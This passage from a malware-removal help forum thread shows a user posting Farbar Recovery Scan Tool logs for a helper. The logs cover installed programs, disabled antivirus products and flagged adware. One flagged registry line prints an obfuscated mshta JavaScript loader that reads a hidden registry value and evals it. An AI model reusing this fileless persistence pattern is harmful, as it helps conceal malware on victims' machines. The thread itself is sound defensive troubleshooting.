Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Help , Need to get virus out my laptop


  • This topic is locked This topic is locked
137 replies to this topic

#16 RayS

RayS

  • Malware Response Team
  • 2,433 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:02:17 AM

Posted 05 June 2018 - 05:56 PM

Hi Dan,

 

Both Fixlog.txt and Addition.txt are truncated  --  most of the text has been cut off (see your posts #14 and #15). Also, all your posts are in double space.

 

Please copy the Notepad files to your thumb drive and then transfer the thumb drive to your clean PC. When you're on your clean PC, copy and paste directly from the Notepad files. Use Ctrl+A and Ctrl+V to be sure you get an exact copy onto this forum. Don't use any editor other than Notepad.

 

Thank you,

 

Ray


I don't accept payment for my help, but it would please me if you perform a kindness for your neighbor. You might also contact your local animal shelter. They can always use a bag of kibble or a few cans of pet food. Who knows... you might even find a life-long furry friend there.


BC AdBot (Login to Remove)

 


#17 danban

danban
  • Topic Starter

  • Members
  • 119 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bronx New York
  • Local time:03:17 AM

Posted 05 June 2018 - 06:10 PM

Hi Ray ,

Sorry about that ,

 

I redid it again and copied it from notepad

 

Here's the Fixlog.txt

 

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 16.05.2018 01
Ran by Dan (04-06-2018 21:01:59) Run:9
Running from C:\Users\Dan\Desktop
Loaded Profiles: Dan (Available Profiles: Dan)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  
*****************
 
 
==== End of Fixlog 21:02:01 ====


#18 danban

danban
  • Topic Starter

  • Members
  • 119 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bronx New York
  • Local time:03:17 AM

Posted 05 June 2018 - 06:12 PM

Here's the Addition.txt

 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 16.05.2018 01
Ran by Dan (04-06-2018 21:07:21)
Running from C:\Users\Dan\Desktop
Windows 8.1 Connected (Update) (X64) (2015-01-30 09:55:12)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1066246007-1091995785-1061003623-500 - Administrator - Disabled)
Dan (S-1-5-21-1066246007-1091995785-1061003623-1001 - Administrator - Enabled) => C:\Users\Dan
Guest (S-1-5-21-1066246007-1091995785-1061003623-501 - Limited - Disabled)
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Bitdefender Antivirus Free Edition (Disabled - Up to date) {3FB17364-4FCC-0FA7-6BBF-973897395371}
AS: Bitdefender Antivirus Free Edition (Disabled - Up to date) {84D09280-69F6-0029-510F-AC4AECBE19CC}
AS: Comodo Defense+ (Disabled - Up to date) {6BAD9487-8DE8-D130-293E-C6A728B4104F}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: COMODO Firewall (Disabled) {E8F7F446-E1BD-DFE6-38D1-54E0ADE01D89}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
4K Video Downloader 4.4 (HKLM-x32\...\{CAB406EC-AF92-417D-9BBB-B2ECE1BC7BA6}) (Version: 4.4.2.2255 - Open Media LLC)
7-Zip (HKLM\...\{F43D5365-6E1C-4A2B-BE51-E16D9554FB1D}) (Version: 9.2.0 - 7-Zip) Hidden
7-Zip (HKLM-x32\...\7-Zip 9.2.0) (Version: 9.2.0 - 7-Zip)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 18.011.20038 - Adobe Systems Incorporated)
Adobe After Effects CC 2015.3 (HKLM-x32\...\AEFT_13_8_0) (Version: 13.8.0 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.8.0.310 - Adobe Systems Incorporated)
Adobe Media Encoder CC 2015.3 (HKLM-x32\...\AME_10_3_0) (Version: 10.3.0 - Adobe Systems Incorporated)
Adobe Premiere Pro CC 2015 (HKLM-x32\...\{38C72D42-0672-43B1-9E05-E7631684F9A1}) (Version: 9.0.0 - Adobe Systems Incorporated)
Aeon (HKLM-x32\...\Aeon) (Version: 3.7.4 - SoundSpectrum)
Andy OS (HKLM\...\Andy OS) (Version: 0.45.5.0 - Andy OS, Inc)
Apple Application Support (HKLM-x32\...\{5D09C772-ECB3-442B-9CC6-B4341C78FDC2}) (Version: 2.3.4 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Applian Director (HKLM-x32\...\Applian Director3.01) (Version: 3.01 - Applian Technologies Inc.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.12 - Michael Tippach)
ASUS Live Update (HKLM-x32\...\{FA540E67-095C-4A1B-97BA-4D547DEC9AF4}) (Version: 3.2.8 - ASUS)
ASUS Screen Saver (HKLM-x32\...\{0FBEEDF8-30FA-4FA3-B31F-C9C7E7E8DFA2}) (Version: 1.0.3 - ASUS)
ASUS Smart Gesture (HKLM-x32\...\{4D3286A6-F6AB-498A-82A4-E4F040529F3D}) (Version: 2.2.14 - ASUS)
ASUS Splendid Video Enhancement Technology (HKLM-x32\...\{0969AF05-4FF6-4C00-9406-43599238DE0D}) (Version: 2.01.0021 - ASUS)
ASUSDVD (HKLM-x32\...\{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.5712.52 - CyberLink Corp.) Hidden
ASUSDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.5712.52 - CyberLink Corp.)
AsusVibe2.0 (HKLM-x32\...\Asus Vibe2.0) (Version: 2.0.12.311 - ASUSTEK)
AVS Audio Converter 8.1.1 (HKLM-x32\...\AVS Audio Converter_is1) (Version: 8.1.1.549 - Online Media Technologies Ltd.)
AVS Audio Editor 8.1.1 (HKLM-x32\...\AVS Audio Editor_is1) (Version: 8.1.1.506 - Online Media Technologies Ltd.)
AVS Disc Creator 5.2.5 (HKLM-x32\...\AVS Disc Creator_is1) (Version: 5.2.5.536 - Online Media Technologies Ltd.)
AVS Document Converter 3.0.2 (HKLM-x32\...\AVS Document Converter_is1) (Version: 3.0.2.238 - Online Media Technologies Ltd.)
AVS Image Converter 4.0.2 (HKLM-x32\...\AVS Image Converter_is1) (Version: 4.0.2.281 - Online Media Technologies Ltd.)
AVS Media Player 4.3.1 (HKLM-x32\...\AVS Media Player_is1) (Version: 4.3.1.114 - Online Media Technologies Ltd.)
AVS Photo Editor 2.3.4 (HKLM-x32\...\AVS Photo Editor_is1) (Version: 2.3.4.148 - Online Media Technologies Ltd.)
AVS Registry Cleaner 3.0.3 (HKLM-x32\...\AVS Registry Cleaner_is1) (Version: 3.0.3.272 - Online Media Technologies Ltd.)
AVS Video Converter 9.2.1 (HKLM-x32\...\AVS4YOU Video Converter 7_is1) (Version: 9.2.1.579 - Online Media Technologies Ltd.)
AVS Video Editor 7.2.1 (HKLM-x32\...\AVS Video Editor_is1) (Version: 7.2.1.269 - Online Media Technologies Ltd.)
AVS Video ReMaker 5.0.2 (HKLM-x32\...\AVS Video ReMaker_is1) (Version: 5.0.2.175 - Online Media Technologies Ltd.)
Bandicam (HKLM-x32\...\Bandicam) (Version: 3.0.4.1036 - Bandisoft.com)
Bandicut (HKLM-x32\...\Bandicut) (Version: 1.2.7.132 - Bandisoft.com)
Bandisoft MPEG-1 Decoder (HKLM-x32\...\BandiMPEG1) (Version:  - Bandisoft.com)
Beta Bugs FloFi VST (HKLM-x32\...\FloFi) (Version: "1.1.0" - "BetaBugs")
Beta Bugs Moneo VST (HKLM-x32\...\Moneo) (Version: "1.0.0" - "BetaBugs")
Beta Bugs WideBug VST (HKLM-x32\...\WideBug) (Version: "1.0.0" - "BetaBugs")
Bitdefender Antivirus Free Edition (HKLM\...\BitDefender Gonzales) (Version: 1.0.21.1109 - Bitdefender)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.15 - Piriform)
COMODO Firewall (HKLM\...\{1EBC6C6F-7D31-4897-B241-DC7052F3E7A5}) (Version: 8.2.0.5027 - COMODO Security Solutions Inc.)
CrazyTalk Animator v2.0 Pipeline (HKLM-x32\...\{7127D4CC-78E6-41E3-8BCB-A50ED34846E2}) (Version: 2.0.1214.1 - Reallusion Inc.)
CrazyTalk v7.32 Standard (HKLM-x32\...\{27C4EA98-84A3-4CDF-A436-F984A0283357}) (Version: 7.32.3114.1 - Reallusion Inc.)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
DaVinci Resolve (HKLM\...\{9B4515CC-A703-49D2-85E6-5348CA30534D}) (Version: 12.5.0032 - Blackmagic Design)
DS-MP3 Source 1.30 (HKLM-x32\...\DS-MP3 Source) (Version:  - )
Eusing Free MP3 Cutter (HKLM-x32\...\Eusing Free MP3 Cutter) (Version:  - )
FaceGen Artist Demo (HKLM-x32\...\{280BB5D8-30DC-4D62-B4D5-A3C19BB30479}) (Version: 1.10.0.0 - Singular Inversions Inc.)
FaceGen Artist Pro (HKLM-x32\...\{F6F73B62-D4E0-46B0-BD1C-3F4F55B107D8}) (Version: 1.10.0.0 - Singular Inversions Inc.)
Flvto Youtube Downloader (HKLM-x32\...\Flvto Youtube Downloader) (Version: 0.6.9 - Hotger)
Gadwin PrintScreen (64-Bit) (HKLM\...\{819A52E1-0929-469A-BEB6-1AEBE0873CFC}) (Version: 5.4.2.0 - Gadwin Systems)
GIMP 2.8.16 (HKLM\...\GIMP-2_is1) (Version: 2.8.16 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 65.0.3325.181 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.7 - Google Inc.) Hidden
Gramblr (HKLM\...\Gramblr) (Version: 2.9.127 - Gramblr Team)
GROOVE 5.6.3 Pro Edition (HKLM\...\{21D8E7FE-7FE7-46B3-B578-22E1ABC5E407}) (Version: 5.6.3 - Gemini)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3355 - Intel Corporation)
Intel® Sideband Fabric Device Driver (HKLM-x32\...\C5A8BC6E-723A-4C0F-96E1-C426D1A4BCA9) (Version: 1.0.0.1002 - Intel Corporation)
Intel® Trusted Execution Engine (HKLM\...\{176E2755-0A17-42C6-88E2-192AB2131278}) (Version: 1.0.0.1064 - Intel Corporation)
ISSE version 0.2.0 (HKLM\...\{9330BAEC-6E26-4C5B-93A1-8BDD9ACF231B}_is1) (Version: 0.2.0 - CCRMA, Stanford University)
ivsEdits Free Edition (HKLM-x32\...\ivsEdits Free Edition) (Version:  - )
Java 8 Update 73 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218073F0}) (Version: 8.0.730.2 - Oracle Corporation)
JBridge (HKLM-x32\...\JBridge) (Version:  - JBridge)
Junk Mail filter update (HKLM-x32\...\{0BE9E708-5DC0-4963-9CFD-0AA519090E79}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
KRISTAL Audio Engine (HKLM-x32\...\KRISTAL Audio Engine) (Version:  - )
Lightworks (HKLM-x32\...\{E94DD4E4-7746-472c-AA7B-1242FED0CFC8}) (Version: 12.6.0.0 - Lightworks)
LUXONIX LFX-1310 (HKLM-x32\...\LUXONIX_LFX-1310) (Version: 1.4 - LUXONIX)
MakeMKV v1.9.1 (HKLM-x32\...\MakeMKV) (Version: v1.9.1 - GuinpinSoft inc)
Massey Plugins Demos [Remove only] (HKLM-x32\...\Massey Plugins Demos) (Version:  - )
MediaShuttlePlugin-v5.4 (HKLM-x32\...\{BA567CFA-F158-44C3-AA40-1773478BD477}) (Version: 5.4.4.71844 - Signiant Inc.)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\OneDriveSetup.exe) (Version: 18.025.0204.0009 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918 (HKLM-x32\...\{dab68466-3a7d-41a8-a5cf-415e3ff8ef71}) (Version: 14.0.23918.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Movavi Video Editor 11 (HKLM-x32\...\Movavi Video Editor 11) (Version: 11.4.1 - Movavi)
Movavi Video Suite 12 (HKLM-x32\...\Movavi Video Suite 12) (Version: 12.0.0 - Movavi)
Movie Maker (HKLM-x32\...\{38F03569-A636-4CF3-BDDE-032C8C251304}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{DD67BE4B-7E62-4215-AFA3-F123A800A389}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 55.0.3 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 55.0.3 (x86 en-US)) (Version: 55.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 54.0 - Mozilla)
mp3splt-gtk (HKLM-x32\...\mp3splt-gtk) (Version:  - )
Muvizu:Play - Heroes and villains (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuHeroesAndVillains) (Version:  - Digimania Ltd)
Muvizu:Play - Heroes and villains Lairs (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuHeroAndVillainLairs) (Version:  - Digimania Ltd)
Muvizu:Play - Lighting Presets (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuLightingPresets) (Version:  - Digimania Ltd)
Muvizu:Play - Mandy Content (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuMandyContentPack) (Version:  - Digimania Ltd)
Muvizu:Play - Prisons (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuPrisons) (Version:  - Digimania Ltd)
Muvizu:Play - Rosie (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuRosie) (Version:  - Digimania Ltd)
Muvizu:Play - Trains (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuTrains) (Version:  - Digimania Ltd)
Muvizu:Play (HKLM-x32\...\Muvizu) (Version: 2015.08.20.01R - Digimania Ltd)
ocenaudio (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\ocenaudio) (Version: 2.0.14 - ocenaudio Team)
PitchWorks remove (HKLM-x32\...\PitchWorks DX) (Version:  - )
PrimoPDF -- brought to you by Nitro PDF Software (HKLM-x32\...\PrimoPDF) (Version: 5 - Nitro PDF Software)
Qualcomm Atheros Client Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Qualcomm Atheros)
QuickTime (HKLM-x32\...\{B67BAFBA-4C9F-48FA-9496-933E3B255044}) (Version: 7.74.80.86 - Apple Inc.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9200.27040 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.20.815.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7213 - Realtek Semiconductor Corp.)
Recuva (HKLM\...\Recuva) (Version: 1.52 - Piriform)
Replay Media Catcher 5 (5.0.1.54) (HKLM-x32\...\Replay Media Catcher 5) (Version: 5.0.1.54 - Applian Technologies)
Replay Video Capture 7 (HKLM-x32\...\Replay Video Capture7.4) (Version: 7.4 - Applian Technologies Inc.)
SearchAwesome (HKLM\...\6320c4d4d9492959f6f8b43b8fdbf2f5) (Version: 13.14.1.204 (i1.0) - SearchAwesome) <==== ATTENTION
ShapeShop B5 (HKLM-x32\...\ShapeShop) (Version:  - )
Skype™ 7.33 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.33.105 - Skype Technologies S.A.)
SMPlayer 16.6.0 (HKLM-x32\...\SMPlayer) (Version: 16.6.0 - Ricardo Villalba)
Softube Plug-Ins (VST AAX 32-bit) (HKLM-x32\...\Softube Plug-Ins (VST AAX 32-bit)) (Version: 2.2.91 - Softube AB)
Synfig Studio (HKLM-x32\...\synfigstudio) (Version: 1.0.2 - )
Total Recorder 8.5 Standard Edition (HKLM-x32\...\TotalRecorder) (Version:  - )
Tupi version 0.2-4 (HKLM-x32\...\Tupi_is1) (Version: 0.2-4 - )
Tweaking.com - Windows Repair (HKLM-x32\...\Tweaking.com - Windows Repair) (Version: 3.8.3 - Tweaking.com)
Update Installer for WildTangent Games App (HKLM-x32\...\{2FA94A64-C84E-49d1-97DD-7BF06C7BBFB2}.WildTangent Games App) (Version:  - WildTangent) Hidden
Virtual Magnifying Glass v3.6 (HKLM-x32\...\Virtual Magnifying Glass_is1) (Version:  - )
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
VMware Player (HKLM\...\{E452E727-86B8-4233-8CC3-41FD817AFAFF}) (Version: 6.0.7 - VMware, Inc.) Hidden
VMware VIX (HKLM-x32\...\{F99FC179-EA67-4BBC-8955-BDDA0CB94B88}) (Version: 1.13.7.62285 - VMware, Inc.)
WD My Cloud (HKLM\...\{3082756C-2147-411F-AE6A-9DCEF0121903}) (Version: 1.0.7.5 - Western Digital Technologies, Inc.)
WebStorage (HKLM-x32\...\WebStorage) (Version: 2.1.2.301 - ASUS Cloud Corporation)
WhiteCap (HKLM-x32\...\WhiteCap) (Version: 5.0.5 - SoundSpectrum)
WildTangent Games App (HKLM-x32\...\{70B446D1-E03B-4ab0-9B3C-0832142C9AA8}.WildTangent Games App-asus) (Version: 4.0.11.2 - WildTangent)
Winamp (HKLM-x32\...\Winamp) (Version: 5.666  - Nullsoft, Inc)
Windows Driver Package - ASUS (ATP) Mouse  (03/17/2014 1.0.0.207) (HKLM\...\AA2CC56D4BBEE037DC99871F5F6551133D2A0CC3) (Version: 03/17/2014 1.0.0.207 - ASUS)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Windows Media Encoder 9 Series (HKLM-x32\...\Windows Media Encoder 9) (Version:  - )
WinFlash (HKLM-x32\...\{8F21291E-0444-4B1D-B9F9-4370A73E346D}) (Version: 2.42.0 - ASUS)
WinPcap 4.1.3 (HKLM-x32\...\WinPcapInst) (Version: 4.1.0.2980 - Riverbed Technology, Inc.)
WinRAR 5.31 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH)
WinX DVD Ripper Platinum 7.5.18 (HKLM-x32\...\WinX DVD Ripper Platinum_is1) (Version:  - Digiarty Software, Inc.)
WonderFox DVD Ripper Speedy 8.1 (HKLM-x32\...\WonderFox DVD Ripper Speedy) (Version: 8.1 - WonderFox Soft, Inc.)
WonderFox DVD Video Converter 10.0 (HKLM-x32\...\WonderFox DVD Video Converter) (Version: 10.0 - WonderFox Soft, Inc.)
Yahoo! Toolbar (HKLM-x32\...\Yahoo! Companion) (Version:  - Yahoo! Inc.)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\ChromeHTML: ->  <==== ATTENTION
CustomCLSID: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001_Classes\CLSID\{162C6FB5-44D3-435B-903D-E613FA093FB5}\InprocServer32 -> C:\Users\Dan\AppData\Local\Microsoft\OneDrive\17.3.6998.0830\amd64\FileCoAuthLib64.dll => No File
CustomCLSID: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\Software\Classes\f2e8449: "C:\Windows\system32\mshta.exe" "javascript:TOWG9H8n="9fTue2";F6q=new ActiveXObject("WScript.Shell");yYl78Ye="OOPGIb";j0tdG8=F6q.RegRead("HKCU\\software\\wsfl\\nfhvb");CnQ2SRmC="VxncXy";eval(j0tdG8);Cw1zFO6q="2Od3ft0";" <==== ATTENTION
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ShellIconOverlayIdentifiers: [!AsusWSShellExt_B] -> {6D4133E5-0742-4ADC-8A8C-9303440F7191} => C:\Program Files (x86)\Common Files\AWS\2.1.2.301\ASUSWSShellExt64.dll [2013-06-25] (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_O] -> {64174815-8D98-4CE6-8646-4C039977D809} => C:\Program Files (x86)\Common Files\AWS\2.1.2.301\ASUSWSShellExt64.dll [2013-06-25] (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_U] -> {1C5AB7B1-0B38-4EC4-9093-7FD277E2AF4E} => C:\Program Files (x86)\Common Files\AWS\2.1.2.301\ASUSWSShellExt64.dll [2013-06-25] (ASUS Cloud Corporation.)
ContextMenuHandlers1-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov)
ContextMenuHandlers1-x32: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ContextMenuHandlers1-x32: [Comodo Antivirus] -> {4255A182-CAD9-4214-A19B-7BA7FB633BBD} => C:\Program Files\COMODO\COMODO Internet Security\cavshell.dll [2016-07-10] (COMODO)
ContextMenuHandlers1-x32: [Gonzales] -> {A50F8401-953F-4C11-8B77-1278C6C7C3F4} => C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\GzShellIntegration.dll [2018-03-08] (Bitdefender)
ContextMenuHandlers1-x32: [ShellConverter] -> {30A4E07E-068A-4d91-8F05-691283A1336B} => C:\Program Files (x86)\Common Files\AVSMedia\ActiveX\AVSShellConverter64.dll [2015-04-06] (Online Media Technologies Ltd.)
ContextMenuHandlers1-x32: [SysMenuExt] -> {020B1D4B-5738-4C77-9E19-4F173DD9B486} => C:\Program Files\Common Files\System\SysMenu64.dll -> No File
ContextMenuHandlers1-x32: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext64.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers1-x32-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers1-x32-x32: [_MovaviSuite10] -> {9D700AB0-33CE-4ab3-BD66-3A73CC2CEDE3} => C:\Program File (x86) Movavi Video Editor Suite 12 - (Free Cracked Version)\Movavi Video Suite 12\vcContext\vcContext.dll [2013-12-11] (Movavi)
ContextMenuHandlers2: [Comodo Antivirus] -> {4255A182-CAD9-4214-A19B-7BA7FB633BBD} => C:\Program Files\COMODO\COMODO Internet Security\cavshell.dll [2016-07-10] (COMODO)
ContextMenuHandlers2-x32: [VMDiskMenuHandler] -> {271DC252-6FE1-4D59-9053-E4CF50AB99DE} => C:\Program Files (x86)\VMware\VMware Player\vmdkShellExt.dll [2015-06-24] (VMware, Inc.)
ContextMenuHandlers2-x32: [VMDiskMenuHandler64] -> {E4D28EDC-8C0B-43EE-9E7D-C8A8682334DC} => C:\Program Files (x86)\VMware\VMware Player\x64\vmdkShellExt64.dll [2015-06-24] (VMware, Inc.)
ContextMenuHandlers3: [BackupContextMenuExtension] -> {b1b96b20-da1d-4a3c-92c1-7229b32f2326} => C:\Windows\system32\mscoree.dll [2013-08-22] (Microsoft Corporation)
